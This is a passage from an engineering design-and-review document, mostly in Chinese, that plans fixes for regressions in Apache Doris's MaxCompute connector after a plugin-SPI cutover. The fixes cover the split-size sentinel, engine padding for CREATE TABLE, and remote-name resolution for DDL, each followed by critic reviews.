一致性哈希 split→BE 落点会与当前 buggy build 不同=良性、对齐 legacy,勿误判为回归;(b) byte_size 扫描 `totalFileSize` 转负,pre-existing legacy 行为,仅 stats/cost/explain)。BE 端从不消费 byte_size split 的真实字节数(legacy 把它塞进未读的 fileLength);split 的字节切分早已在 `SplitOptions.SplitByByteSize(splitByteSize)`(:131)阶段完成,session 自带该信息,BE 用 `IndexedInputSplit(sessionId, splitIndex)` 复原,不需要 size。 + - 副作用对齐:改后 `setPath` 字符串变为 `[ splitIndex , -1 ]`,这与 legacy 完全一致(legacy `getStart()=splitIndex`、`getLength()=-1` ⇒ 同样的 `[ splitIndex , -1 ]`)。即 path 字符串也是精确 mirror,无新增偏差。 + - 不需要扩展 SPI、不需要新增 override、不改 thrift:`TFileRangeDesc.size` 字段与 `populateRangeParams` seam 均已存在,sentinel 是纯数值约定。 + - 关于"通用插件层 vs MC 专有":此 sentinel(`split_size == -1` ⇒ IndexedInputSplit)是 **MaxCompute 连接器与其 BE-side `MaxComputeJniScanner` 之间私有的、per-range 的语义契约**,经由 `MaxComputeScanRange.populateRangeParams`(连接器自有代码,getTableFormatType="max_compute" 专属分支)实现,**不**经过 `PluginDrivenScanNode` 的通用逻辑(后者只调用 `scanRange.populateRangeParams(...)` 委派,见 PluginDrivenScanNode.java:392)。因此修复**就该 keyed 在 MaxCompute 连接器自己的 range 实现里**,这正是 SPI 设计的"per-range 契约由 provider 负责、与 legacy 等价"原则(P3-T08-tableformat-dispatch-design.md §结论 4:per-range 契约不变)。无须、也不应在 fe-core 通用层 hardcode maxcompute。无历史决策被推翻(review 已确认"历史零记载");本设计反而补齐了 P4-T05-T06-cutover-design 未显式记录的 per-range size 契约。 + +- **Implementation Plan** + - [fe-connector-maxcompute] `MaxComputeScanPlanProvider.java:268`:把 byte_size 分支的 `.length(splitByteSize)` 改为 `.length(-1L)`。加一行简短注释说明 -1 是 BE 区分 BYTE_SIZE/ROW_OFFSET 的 sentinel(mirror legacy MaxComputeScanNode.java:659 的 length=-1)。row_offset 分支(:286 `.length(count)`)和 limit-optimization 分支(:334 `.length(rowsToRead)`)**不动**——它们正确发送真实 rowCount。 + - [fe-connector-maxcompute] 不改 `MaxComputeScanRange.java`:`populateRangeParams` 的 `setSize(getLength())` 保持原样,fix 后自然回填 -1。`Builder.length` 默认值已是 -1(:134),与意图一致。 + - 守门:本 issue 独立 commit;只触连接器,构建带 `-pl :fe-connector-maxcompute`(连带其依赖 `-am` 视根 pom 而定)。不需 `-pl :fe-core`,不需 BE 重编,不动 thrift。 + +- **Risk** + - 回归风险:极低且收敛。仅改默认 byte_size 路径的一个常量,使其与 legacy 字节对齐;row_offset / limit 路径不变。改后默认查询从"静默错误"变为"正确",方向单一。 + - 对其他连接器/插件影响:**零**。sentinel 是 MaxCompute connector ↔ MaxComputeJniScanner 私有契约,改动局限于 MC 的 range 构造分支;Hive/Hudi/ES 等其他 provider 各自的 `populateRangeParams` 与 size 语义不受影响(它们的 size 是真实文件字节,与本 sentinel 无关)。 + - keep 集:本 fix **不**触碰 legacy `MaxComputeScanNode.java`(keep 基线,只读对照);只改翻闸 connector。符合"legacy 保留、cutover 对齐 legacy 可观察行为"。 + - checkstyle / import-gate:仅改一个字面量参数,不新增 import、不新增类型;`-1L` 与既有 long 字面量风格一致。无 import-gate 影响。 + - 潜在隐患排查:**[T06d 修正]** `getLength()` 在 MC range 中除 setPath/setSize 外还有第三消费方 `PluginDrivenSplit.java:42 → FileSplit.length`(被 `FederationBackendPolicy.java:499` / `FileQueryScanNode.java:430` 消费),原文"无其它消费方(grep 已证)"有误;但该三处改后均看到 -1,良性且对齐 legacy,详见 `P4-T06d-FIX-READ-SPLIT-design.md` §Risk。`setPath` 字符串与 legacy 同步变为 `[ splitIndex , -1 ]`,不破坏任何 BE 解析(BE 不解析该 path 字符串内容,只用作显示/定位)。 + +- **Test Plan** + - UT(放 `fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/`,新增轻量 `MaxComputeScanRangeTest`,无网络、无 odps 依赖,符合该模块既有 CI-runnable 单测约定): + - 断言 1(回归红点,Rule 9 编码 WHY):用 `MaxComputeScanRange.builder().start(splitIndex).length(-1).splitType(SPLIT_TYPE_BYTE_SIZE)...build()` 构造,调用 `populateRangeParams(formatDesc, rangeDesc)`,断言 `rangeDesc.getSize() == -1`。注释写明:size 必须是 -1 sentinel,否则 BE 把 byte_size split 误判为 ROW_OFFSET → 损坏读(链接 MaxComputeJniScanner.java:125-128)。该断言在 fix 前必然失败(当前会是 splitByteSize)。 + - 断言 2(对照):row_offset range(`.length(count).splitType(SPLIT_TYPE_ROW_OFFSET)`)断言 `rangeDesc.getSize() == count`(真实值,非 -1),锁住"只有 byte_size 用 sentinel"的意图。 + - 断言 3(path mirror,可选):断言 byte_size range 的 `rangeDesc.getPath()` == `"[ , -1 ]"`,与 legacy 字符串对齐。 + - E2E(`regression-test/suites/external_table_p2/maxcompute/`,默认 byte_size 策略,即不显式设 `mc.split_strategy` 的常规 catalog): + - 复用 `test_external_catalog_maxcompute.groovy` 的既有读断言(order_qt_q1 `select count(*) from web_site`、order_qt_q2 `select *`、int_types / mc_parts 系列)——这些查询在默认 byte_size 路径下,fix 前读出错误数据(行数/列值与 .out 基线不符),fix 后应与 legacy `.out` 基线一致。关键断言点:`count(*)` 行数 与 全列 `select *` 的逐行值。 + - 若 CI 有 legacy↔cutover 对照机制,断言两者结果集逐行相等(本 fix 的核心目标即"cutover 默认路径 == legacy")。 + - 不新增 suite:该 blocker 是默认路径读正确性,既有读套件已是最直接的覆盖面;新增反而偏离最小改动。 + +**Open questions**: E2E 严格落地依赖一个真实 MaxCompute 端点(external_table_p2 需凭证),CI 中**默认跳过**该套件;唯一 CI-runnable 守门是 UT。T06d 采用的 UT 直接驱动 provider 的 byte_size 分支(`buildSplitsFromSession` 反射 + 离线 fake session),断言 `rangeDesc.getSize()==-1`,**provider 分支真实回退会令其失败**(已验证 expected:<-1> but was:<268435456>);E2E 作为人工/带凭证回归。 · 是否存在依赖现有 byte_size 错误 size 的隐性消费方?**[T06d 修正]** 实际有第三消费方 `FileSplit.length`(一致性哈希 + totalFileSize),改后看到 -1=良性且对齐 legacy(legacy 同为 -1),非 setPath/setSize 两处,详见 `P4-T06d-FIX-READ-SPLIT-design.md` §Risk;explain/profile 的 totalFileSize 会转负(pre-existing legacy 行为,仅 stats/cost)。 + +#### 🔎 对抗 critic — verdict: `sound` + +**需修正(corrections)**: +- Factual correction to the design's grep claim: getLength() for a byte_size MaxComputeScanRange has THREE consumers, not two -- setPath (MaxComputeScanRange.java:120), setSize (:122), AND PluginDrivenSplit.java:42 -> FileSplit.length (further read by FederationBackendPolicy.java:499 and FileQueryScanNode.java:430). The conclusion (fix is legacy-equivalent and safe) is unchanged and verified, but the supporting statement 'grep 全证实 ... 只 流向两处' is wrong and should be corrected. +- Minor: the design says the fix mirrors legacy MaxComputeScanNode.java:659 length=-1; verified accurate -- legacy constructor MaxComputeSplit(BYTE_SIZE_PATH, splitIndex, -1, splitByteSize, ...) puts -1 in arg3 (length) and splitByteSize in arg4 (fileLength, unread by BE). Connector after fix is byte-exact (setSize=-1, setStartOffset=splitIndex, path='[ splitIndex , -1 ]'). No correction needed to the core claim. + +**遗漏(gaps)**: +- Risk analysis omits a third consumer of getLength(): PluginDrivenSplit.java:42 passes scanRange.getLength() into the FileSplit.length field. The design's repeated claim that splitByteSize/getLength flows ONLY into setPath(:120) and setSize(:122) ('grep fully confirms') is factually incomplete. FileSplit.length is consumed downstream by FederationBackendPolicy.java:499 (primitiveSink.putLong(split.getLength()) in consistent-hash backend assignment) and FileQueryScanNode.java:430 (totalFileSize += split.getLength()). After the fix these see -1 instead of 268435456 -- which is BENIGN because legacy MaxComputeSplit also used length=-1 (the current buggy cutover diverges from legacy here too), so the fix actually improves parity. But the design must update the grep claim and add these consumers to the impact analysis instead of asserting 'only two places'. +- Test Plan does not acknowledge that the named E2E suite (regression-test/suites/external_table_p2/maxcompute/test_external_catalog_maxcompute.groovy) is an external_table_p2 suite requiring live MaxCompute/ODPS credentials, so it will be skipped in normal CI. The design frames it as 'the most direct coverage', but the only CI-runnable automated guard is the proposed UT. This should be stated explicitly so the fix is not merged believing E2E runs unattended. +- The design scopes out (correctly) the broader read-path descriptor population, but for the reviewer's checklist: the JNI scanner requires TIME_ZONE (MaxComputeJniScanner.java:139 Objects.requireNonNull on 'time_zone'), and BE max_compute_jni_reader.cpp:62-77 does NOT set time_zone in the properties map -- it must arrive via mc_desc->properties()/endpoint. Whether the cutover descriptor carries time_zone/project/quota/endpoint correctly is the separate READ-P1 blocker; this fix neither helps nor regresses it, but the split-size fix alone will NOT yield correct reads if READ-P1 is unfixed. The design states this dependency but does not call out the time_zone requirement specifically. + +**额外风险**: +- Backend-assignment determinism: FederationBackendPolicy.java:499 hashes split.getLength() into the consistent-hash placement. Changing length from 268435456 to -1 for every byte_size split changes which backend each split lands on (vs the current buggy cutover). This is invisible/benign for correctness and matches legacy, but means a before/after A-B comparison of split-to-BE placement on the SAME cutover build will differ -- worth noting so it is not mistaken for a regression during validation. +- FileQueryScanNode.java:430 accumulates totalFileSize += getLength(); with length=-1 per split this drives totalFileSize negative for byte_size scans (one -1 per split). This is a pre-existing legacy behavior (legacy also had -1) used only for stats/cost/logging, not correctness, but it propagates to profile/explain numbers and any cost-based heuristic keyed on totalFileSize. Low risk, pre-existing, but the design does not mention it. +- Other PluginDriven connectors (jdbc/es/trino/hive/hudi): the fix is strictly inside MaxComputeScanRange's byte_size branch in MaxComputeScanPlanProvider, so zero cross-connector impact is confirmed -- the design's claim holds. No additional risk here, but it is worth recording that the -1 sentinel semantics are private to the MaxCompute connector <-> MaxComputeJniScanner contract and any future generic use of ConnectorScanRange.getLength()==-1 by other code paths would need re-examination. +- No follower-replay/master sync concern: verified the change is purely in query-plan-time scan-range construction (planScan/populateRangeParams), not persisted to the edit log, so no replay/HA implications. (Confirms one of the prompt's checklist items as a non-issue.) + +--- + +### 阶段 2 — 恢复 DDL 可用 + +### FIX-DDL-ENGINE — 无 ENGINE 的 CREATE TABLE — paddingEngineName/checkEngineWithCatalog 识别 PluginDriven + +- **Problem** + 翻闸(T06b)后 `max_compute` catalog 实例化为 `PluginDrivenExternalCatalog`(`CatalogFactory.java:52` SPI_READY_TYPES 含 `max_compute` → `:112` new PluginDrivenExternalCatalog)。用户在该 catalog 下执行**不写 `ENGINE=maxcompute` 子句**的 `CREATE TABLE`(legacy 下完全可用、且是 MC 最常见写法,见 `regression-test/suites/external_table_p2/maxcompute/test_max_compute_create_table.groovy` Test1/Test2/Test3 均无 ENGINE 子句)时,在**分析期**直接抛 `AnalysisException: Current catalog does not support create table: `,根本到不了 `PluginDrivenExternalCatalog.createTable` override(`PluginDrivenExternalCatalog.java:264`)。触发条件:catalog 类型走 SPI(当前仅 `max_compute` 是 full-adopter;jdbc/es/trino 也走 PluginDriven 但本身不支持 CREATE TABLE,故主要可见于 MC,但缺口是通用插件层缺口)。这是 legacy 可用、翻闸即坏的 blocker 级回归,且 T06c 回归矩阵把 CREATE TABLE 一律误标 PASS、未覆盖此子场景。 + +- **Root Cause** + `CreateTableInfo.paddingEngineName`(`fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfo.java:896-918`)在 `engineName` 为空时按 catalog **具体子类** `instanceof` 推断 engine:`:912 else if (catalog instanceof MaxComputeExternalCatalog) engineName = ENGINE_MAXCOMPUTE`,无匹配则 `:914-915 throw "Current catalog does not support create table"`。翻闸后 catalog 不再是 `MaxComputeExternalCatalog` 而是 `PluginDrivenExternalCatalog`,既非 HMS/Iceberg/Paimon 也非 MC → 落 else 抛错。 + 同一缺陷存在于 `checkEngineWithCatalog`(`:376-393`),其 `:390 else if (catalog instanceof MaxComputeExternalCatalog && !engineName.equals(ENGINE_MAXCOMPUTE)) throw` —— 若用户**显式写** `ENGINE=maxcompute`,翻闸后该 catalog-engine 一致性校验被静默绕过(漏 throw,非崩溃),属同源的镜像缺口,应一并修以保持 parity。 + 根因层面:这两处 dispatch keyed on legacy 具体子类(`MaxComputeExternalCatalog`),而 PluginDriven SPI 把所有 SPI 连接器收敛到单一 `PluginDrivenExternalCatalog`,catalog 的真实类型只剩 `getType()`(返回 props 里的 catalog type 字符串,如 `"max_compute"`,见 `PluginDrivenExternalCatalog.java:235-239`)。这是与 [catalog-spi-cutover-fe-dispatch-gap] 同族的"FE 分发未接 SPI"缺口。 + +- **Design** + 仿照仓内既有约定 `PluginDrivenExternalTable.getEngine()`(`PluginDrivenExternalTable.java:196-219`,switch on `((PluginDrivenExternalCatalog) catalog).getType()` 映射到各 engine 名)—— 在 `paddingEngineName` / `checkEngineWithCatalog` 增加 `PluginDrivenExternalCatalog` 分支,keyed on `getType()` 而非 hardcode `maxcompute`,使其通用惠及所有 full-adopter 连接器,且 Batch D 删 legacy MC 引用后仍成立。 + + 1. **`paddingEngineName`**:在 `:912` MC 分支之后、`:914 else` 之前,插入: + `else if (catalog instanceof PluginDrivenExternalCatalog) { engineName = pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog); }` + 新增 private helper `pluginCatalogTypeToEngine(PluginDrivenExternalCatalog c)`:`switch (c.getType())` → `case "max_compute": return ENGINE_MAXCOMPUTE;`(其余 SPI 类型如 jdbc/es/trino 在 CREATE TABLE 上下文不会到这里,或可 default 落入"does not support create table" throw 以镜像它们 SPI 不支持建表的现状)。**关键映射点**:`getType()` 返回 `"max_compute"`(CatalogFactory key,带下划线),须映射到 `ENGINE_MAXCOMPUTE = "maxcompute"`(`:125`,无下划线)。**不可**复用 `TableType.MAX_COMPUTE_EXTERNAL_TABLE.toEngineName()` —— 该枚举无 case → 返回 null(确认见 `TableIf.java:225-269`,MC 不在 switch 内),会把 engineName 置 null 触发后续 NPE。 + 2. **`checkEngineWithCatalog`**:在 `:390` MC 分支后插入对称分支: + `else if (catalog instanceof PluginDrivenExternalCatalog && !engineName.equals(pluginCatalogTypeToEngine((PluginDrivenExternalCatalog) catalog))) throw new AnalysisException("MaxCompute type catalog can only use \`maxcompute\` engine.");` + (msg 以连接器声明 engine 为准;最小改动可复用同一 helper。) + 3. **mirror 的 legacy 可观察行为**:legacy `MaxComputeExternalCatalog` → `ENGINE_MAXCOMPUTE`(`:912-913`),padding 后 engineName=`maxcompute`,顺利通过下游白名单 `checkEngineName:944`(含 ENGINE_MAXCOMPUTE)与 `analyzeEngine:1121-1127`(MC 允许 distribution/partition desc)。本修法令 PluginDriven(type=max_compute)产出同一 `maxcompute` 字符串,下游零改动即与 legacy 完全等价。 + 4. **SPI 是否需扩展**:**不需**。`Connector` SPI(`fe-connector-api/.../Connector.java`)无 engine-name 声明,引入它属过度设计;`getType()` 已足够 key。本修法纯 fe-core 内,不触 SPI/connector/thrift/BE。 + 5. **import**:`CreateTableInfo.java` 已 import `MaxComputeExternalCatalog`(`:52`)等;需新增 `import org.apache.doris.datasource.PluginDrivenExternalCatalog;`(同包 `org.apache.doris.datasource`,与既有 `CatalogIf`/`InternalCatalog` 同级)。 + 6. **与历史决策的关系(显式标注)**:Batch D removal 设计(`P4-batchD-maxcompute-removal-design.md:100`)计划"删 CreateTableInfo ~:390/:912 的 2× `instanceof MaxComputeExternalCatalog`"。本修法不与之冲突但**修正其前提**:Batch D 不应直接删除这两个分支,而应在删 legacy MC 分支的同时**保留/已由本 fix 落地的 PluginDriven 分支**(keyed on getType()),否则删完会把无 ENGINE 的 CREATE TABLE 永久坐实为报错(正是 review 综合总结 §二.4 警告的"amendment 自触发"模式)。建议在 decisions-log 标注:DDL-P1 fix 先落 PluginDriven 分支,Batch D 退化为"仅删 legacy MC 的 2 个 instanceof 分支 + import"。 + +- **Implementation Plan**(逐文件逐方法,均 **fe-core** 层) + 1. [fe-core] `CreateTableInfo.java` 顶部 import 区新增 `import org.apache.doris.datasource.PluginDrivenExternalCatalog;`(放在 `:51 InternalCatalog` 与 `:52 maxcompute.MaxComputeExternalCatalog` 之间,按字母序)。 + 2. [fe-core] `CreateTableInfo.java:896-918 paddingEngineName`:在 `:913` 之后、`:914 else` 之前插入 `else if (catalog instanceof PluginDrivenExternalCatalog)` 分支,调用新 helper。 + 3. [fe-core] `CreateTableInfo.java:376-393 checkEngineWithCatalog`:在 `:391` 之后插入对称的 `else if (catalog instanceof PluginDrivenExternalCatalog && !engineName.equals(...))` 分支。 + 4. [fe-core] `CreateTableInfo.java` 新增 private static helper `pluginCatalogTypeToEngine(PluginDrivenExternalCatalog)`:`switch(getType())` → `"max_compute"`→`ENGINE_MAXCOMPUTE`,default 抛"does not support create table"(或对 jdbc/es/trino 显式拒,保持其现状)。 + 5. 守门:改 fe-core 用 `-pl :fe-core -am`;`fe-code-style`(Checkstyle) + import-gate(新 import 须真用到);本 issue 独立 commit `[P4-DDL-P1]`。 + +- **Risk** + - **回归面极窄**:仅在 `engineName` 为空(无 ENGINE 子句)且 catalog 为 PluginDriven 时新增一条分支;HMS/Iceberg/Paimon/Internal/legacy-MC 路径字节级不变(分支顺序在 MC 之后、else 之前)。 + - **对其他连接器/插件**:helper default 分支保留对 jdbc/es/trino-connector 的"不支持建表"语义(它们 SPI 本就不支持 CREATE TABLE,落 default throw 与现状一致),无新增可用性也无新增破坏。`checkEngineWithCatalog` 的新分支仅在用户显式写错 ENGINE 时 throw,对正确写法无影响。 + - **keep 集**:本 fix **依赖** `MaxComputeExternalCatalog` import 仍在 keep 集(Batch D 删它前 DDL-P1 必须先修),需在 commit message / decisions-log 标注顺序依赖,避免 Batch D 误删 PluginDriven 分支。 + - **checkstyle/import-gate**:新增 1 个 import,helper 方法须有 Javadoc 或保持 private 简短;switch 默认分支不可漏。 + - **getType() 字符串脆性**:依赖 `"max_compute"` 字面量(CatalogFactory key),与 `PluginDrivenExternalTable.getEngine():212` 同一约定,风险已被既有代码承担;若未来改 key 两处需同步(可在 helper 注释引用 CatalogFactory.SPI_READY_TYPES)。 + +- **Test Plan** + - **UT(fe-core)**:在 `fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfoTest.java`(已存在)新增用例,或就近放 `PluginDrivenExternalCatalog` 相关测试目录。断言 WHY(Rule 9):mock/构造一个 `PluginDrivenExternalCatalog`(参 T06c `TestablePluginCatalog`:反射注入 connector + stub buildConnectorSession)使其 `getType()=="max_compute"`,对一个 `engineName=null` 的 `CreateTableInfo` 调 `paddingEngineName` 后断言 `getEngineName()==ENGINE_MAXCOMPUTE`(编码:翻闸后无 ENGINE 的 CREATE TABLE 必须自动补 maxcompute,而非抛错);对显式 `engineName="hive"` 调 `checkEngineWithCatalog` 断言抛 AnalysisException(编码:catalog-engine 一致性校验在 PluginDriven 下仍生效)。helper default 分支:type="jdbc" 时 padding 抛"does not support create table"。 + - **E2E(regression-test)**:`regression-test/suites/external_table_p2/maxcompute/test_max_compute_create_table.groovy` Test1(`:62-71` 无 ENGINE 的 Basic CREATE TABLE)即为天然断言点 —— 翻闸后必须仍 `CREATE TABLE` 成功、`show tables like` 命中、`SHOW CREATE TABLE`(`qt_test1_show_create_table`)回显 engine 为 maxcompute/无报错。无需新增套件,本 fix 的成功标准 = 该既有套件在翻闸态下由 FAIL 转 PASS。可补一条断言:无 ENGINE CREATE TABLE 后 `SHOW CREATE TABLE` 的输出包含 `ENGINE=maxcompute`(对齐 legacy 回显)。 + +**Open questions**: helper default 分支对 jdbc/es/trino-connector(其 SPI 不支持 CREATE TABLE)应保持现状抛 throw 还是显式更友好报错 —— 建议保持与现状一致(落 does-not-support 分支),待各连接器 full-adopt 时再各自补 · checkEngineWithCatalog 新分支的 AnalysisException 文案:沿用 legacy 'MaxCompute type catalog can only use maxcompute engine' 还是按 connector 声明的 engine 名通用化 —— 倾向通用化(显示 getType() 推导的 engine 名),但需确认无回归测试断言旧文案 · 是否需要把 'max_compute'→'maxcompute' 的映射约定抽到 PluginDrivenExternalCatalog/单一常量,避免与 PluginDrivenExternalTable.getEngine():212 的字面量重复(最小改动下暂不抽,仅加注释引用) + +#### 🔎 对抗 critic — verdict: `needs-revision` + +**需修正(corrections)**: +- Import placement instruction is wrong and will fail Checkstyle. Step 1 says insert the new import 'between :51 InternalCatalog and :52 maxcompute.MaxComputeExternalCatalog, 按字母序'. Actual lines are 48-53 (off by two), and ASCII-case-sensitive ordering puts uppercase 'PluginDrivenExternalCatalog' (P) BEFORE lowercase sub-package imports 'hive.' / 'iceberg.' / 'maxcompute.' / 'paimon.'. Correct position is immediately after line 49 (org.apache.doris.datasource.InternalCatalog) and BEFORE line 50 (org.apache.doris.datasource.hive.HMSExternalCatalog) — i.e. grouped with the top-level datasource.* classes, not after the sub-packages. The stated placement would put it after hive/iceberg and Checkstyle CustomImportOrder would reject it. +- Line-number anchors throughout are off by two for the import region (design cites :51/:52 for InternalCatalog/MaxComputeExternalCatalog; actual is :49/:52). The method/branch anchors (paddingEngineName 896-918, MC branch 912, checkEngineWithCatalog 376-393, MC branch 390) are accurate; only the import-region anchors drift. Minor but the import-region drift directly produces the wrong-placement error above. + +**遗漏(gaps)**: +- E2E assertion is factually wrong and would FAIL even with a correct fix. The design's proposed supplementary assertion 'SHOW CREATE TABLE 输出包含 ENGINE=maxcompute' contradicts actual rendering. SHOW CREATE TABLE renders ENGINE= + table.getEngineTableTypeName() (Env.java:4283-4284), and PluginDrivenExternalTable.getEngineTableTypeName() (PluginDrivenExternalTable.java:232-233) returns TableType.MAX_COMPUTE_EXTERNAL_TABLE.name() == 'MAX_COMPUTE_EXTERNAL_TABLE'. The recorded baseline regression-test/data/.../test_max_compute_create_table.out line 3 confirms 'ENGINE=MAX_COMPUTE_EXTERNAL_TABLE', not 'ENGINE=maxcompute'. The design conflates analysis-time engineName ('maxcompute', used for DDL padding/validation) with display-time getEngineTableTypeName ('MAX_COMPUTE_EXTERNAL_TABLE'). The existing qt_test1_show_create_table already covers the regression correctly; the proposed extra assertion must be dropped. +- UT feasibility detail omitted: both paddingEngineName (line 899) and checkEngineWithCatalog (line 383) re-fetch the catalog via Env.getCurrentEnv().getCatalogMgr().getCatalog(ctlName) by NAME — they ignore any directly-constructed catalog object. The UT plan says 'construct a PluginDrivenExternalCatalog so getType()==max_compute' but never states it must be registered into CatalogMgr (or CatalogMgr mocked) for the by-name lookup to return it. As written the UT would hit the real CatalogMgr and not find the test catalog. +- CTAS path benefits but is unmentioned: validateCreateTableAsSelect (line 926) also calls paddingEngineName, so CTAS into a max_compute PluginDriven catalog is equally broken pre-fix and equally fixed. The design scopes only plain CREATE TABLE and never lists CTAS as a covered scenario or a test target, leaving a verification gap. +- No UT/E2E asserts the checkEngineWithCatalog mirror actually had a behavior change. The design claims the explicit-ENGINE consistency check is 'silently bypassed' pre-fix, but provides no failing-then-passing test that a wrong explicit ENGINE (e.g. ENGINE=hive on a max_compute catalog) is rejected only after the fix. Without it the mirror branch is untested against its WHY (violates Rule 9: the test could pass with the branch absent). + +**额外风险**: +- Root-cause analysis, central type-string mapping, and both target sites are otherwise CORRECT and verified: getType() returns lowercase 'max_compute' (CatalogFactory.java:90 toLowerCase + :100 putIfAbsent, :235-239 getType), the same key PluginDrivenExternalTable.getEngine()/getEngineTableTypeName() switch on; ENGINE_MAXCOMPUTE='maxcompute' (:125); and the warning against reusing TableType.MAX_COMPUTE_EXTERNAL_TABLE.toEngineName() is valid — that enum is NOT in the toEngineName() switch (TableIf.java) and returns null. The fix's destination is real: MaxComputeConnectorMetadata.createTable IS implemented (line 283), so padding the engine genuinely reaches a working createTable, not just a deferred failure. +- default-branch behavior for jdbc/es/trino is correctly non-regressive: pre-fix those catalogs already hit the same 'Current catalog does not support create table' throw at line 915, and ConnectorTableOps.createTable default also throws 'CREATE TABLE not supported' (line 66). So the helper's default-throw preserves their status quo — no new breakage, as claimed. +- Follower replay / master sync is NOT a concern for this fix (prompt flagged it): engine padding is analysis-time on the receiving FE; persistence uses logCreateTable edit log (PluginDrivenExternalCatalog.java:279) independent of engineName. No replay change needed. +- Batch-D ordering dependency is real and correctly flagged: P4-batchD-maxcompute-removal-design.md:100 plans to delete both instanceof MaxComputeExternalCatalog branches in CreateTableInfo; if Batch D runs without first landing the PluginDriven branch, no-ENGINE CREATE TABLE is permanently broken. The keep-set / commit-ordering note is warranted. Confirmed UnboundTableSinkCreator (CTAS/INSERT sink) already has PluginDrivenExternalCatalog branches (:68/:108/:149) from T06c — so CreateTableInfo really is the last unwired analysis-time CREATE TABLE gate, supporting the design's scoping. +- Latent fragility (acknowledged by design): two now-parallel switch-on-getType() tables (CreateTableInfo helper + PluginDrivenExternalTable.getEngine/getEngineTableTypeName) must stay in sync if SPI_READY_TYPES keys change. Acceptable given existing code already accepts this risk, but a future jdbc/es full-adopter will require touching both — worth the cross-reference comment the design suggests. + +--- + +### FIX-DDL-REMOTE — DDL 远端名解析 — CREATE/DROP TABLE 用 getRemoteName/getRemoteDbName 再发 connector + +- **Problem**: 翻闸到 `PluginDrivenExternalCatalog` 后,对启用了名映射的 catalog(`lower_case_meta_names=true` / `lower_case_database_names=1` 或 `2` / `meta_names_mapping`,使本地展示名 ≠ ODPS 远端真名)执行 `CREATE TABLE` / `DROP TABLE` 时,FE 把**本地名**原样透传给连接器,连接器再原样喂给 ODPS SDK。用户可见症状: + - `CREATE TABLE`:在错误大小写/映射后的库名下建表,或建到不存在的库报错。 + - `DROP TABLE`:`getTableHandle` 用本地小写/映射名查 ODPS 定位不到真实表 → `IF EXISTS` 静默不删(残表)、非 `IF EXISTS` 误报“表不存在”;极端情况删错对象。 + - 触发条件:catalog 属性开启上述任一名映射,且本地名与远端名不一致。未开映射时本地名==远端名,行为无差异(解释为何 gate/默认 e2e 未暴露)。这是 legacy 可用、翻闸即坏的**数据正确性回归**。 + +- **Root Cause**: + - CREATE:`fe/fe-core/.../PluginDrivenExternalCatalog.java:267-268` `CreateTableInfoToConnectorRequestConverter.convert(createTableInfo, createTableInfo.getDbName())` 传**本地** dbName;converter `fe/fe-core/.../connector/ddl/CreateTableInfoToConnectorRequestConverter.java:63-64` 用该 dbName 并直接 `info.getTableName()`(本地表名)。连接器 `fe/fe-connector/.../MaxComputeConnectorMetadata.java:285-286` 把 `request.getDbName()/getTableName()` 原样喂 `structureHelper.tableExist`/`createTableCreator`→ODPS。 + - DROP:`PluginDrivenExternalCatalog.java:357-359` 用本地 `dbName`/`tableName` 调 `metadata.getTableHandle`;连接器 `MaxComputeConnectorMetadata.java:104,346-347` 把本地名原样喂 SDK。 + - Legacy 基线(须 mirror):`fe/fe-core/.../datasource/maxcompute/MaxComputeMetadataOps.java` — createTableImpl `:179`/`:219` 用 `db.getRemoteName()` 作 dbName(表名保持原始 `createTableInfo.getTableName()`,**legacy CREATE 不对表名做 remote 解析**,因为表尚不存在、无本地→远端映射);dropTableImpl `:266-267` 用 `dorisTable.getRemoteDbName()`(= `db.getRemoteName()`)与 `dorisTable.getRemoteName()`。 + - 名映射来源:`fe/fe-core/.../ExternalCatalog.java:548-560` buildMetaCache 令 localName≠remoteName;`ExternalDatabase.getRemoteName():407-409`、`ExternalTable.getRemoteName():166-168`、`ExternalTable.getRemoteDbName():535-536`。 + - 注意 createDb/dropDb 不在本 issue 范围:legacy 的实际 SDK 调用对库名也用**原始本地名**(createDbImpl `:122`、dropDbImpl 实删 `:156`),仅 dropDbImpl 的 force 级联枚举用 `getRemoteName()`(属另一发现 DDL-P2)。故本 fix 只动 CREATE TABLE 的 db 名 + DROP TABLE 的 db/table 名。 + +- **Design**: remote 解析放 **FE(`PluginDrivenExternalCatalog`)**,与现有读路径 `getRemoteName` 用法、与 base `ExternalCatalog.dropTable:1119-1131`(先 `getDbNullable` 再 `db.getTableNullable` 取 dorisTable)一致;**不扩展 SPI**、不改连接器(连接器继续把 handle 里的名字当“已是远端名”原样发 SDK,契约保持“FE 负责 local→remote”)。这是通用插件层缺口(任何 full-adopter 都需),但实现 **keyed on PluginDriven 的通用 `ExternalDatabase`/`ExternalTable` getRemoteName API,非 hardcode maxcompute**。 + - createTable override:解析 db 远端名后传给 converter。最小改动用现有 converter 第二参(`convert(info, dbName)` 注释已写“caller may normalize case”)—— + `ExternalDatabase db = getDbNullable(createTableInfo.getDbName());`(db==null 抛 `DdlException("Failed to get database ...")`,mirror legacy `MaxComputeMetadataOps:172-176` 与 base `ExternalCatalog:1120-1122`),随后 `convert(createTableInfo, db.getRemoteName())`。表名保持 converter 内 `info.getTableName()` 原始值(mirror legacy:CREATE 不解析远端表名)。 + - dropTable override:先 `ExternalDatabase db = getDbNullable(dbName)`;db==null 时按 ifExists 干净返回 / 否则抛(mirror base `:1120-1128`、legacy 经 `getTableNullable`)。再 `ExternalTable dorisTable = db.getTableNullable(tableName)`;dorisTable==null 时按 ifExists 返回 / 否则抛(mirror legacy `dropTableImpl` 的“表不存在”分支与 base `:1124-1128`)。然后用 `dorisTable.getRemoteDbName()` 与 `dorisTable.getRemoteName()` 调 `metadata.getTableHandle(session, remoteDb, remoteTbl)`;后续 `metadata.dropTable(handle)` 不变。editlog 与缓存失效仍用**本地** dbName/tableName(mirror base `:1132` 与 legacy `afterDropTable` 用本地名)。 + - 须 mirror 的 legacy 可观察行为:建/删命中正确远端对象;IF EXISTS 在表不存在时静默成功;非 IF EXISTS 抛明确 `DdlException`;editlog/缓存键沿用本地名(保持 follower replay 一致)。 + - 通用性说明:解析仅依赖 `ExternalCatalog.getDbNullable` + `ExternalDatabase.getRemoteName` + `ExternalTable.getRemoteDbName/getRemoteName`,对所有 PluginDriven 连接器一致;未开名映射时 `getRemoteName()` 回落为本地名(`:408`/`:167` 的 `Strings.isNullOrEmpty` 兜底),行为不变。 + +- **Implementation Plan**(单 issue 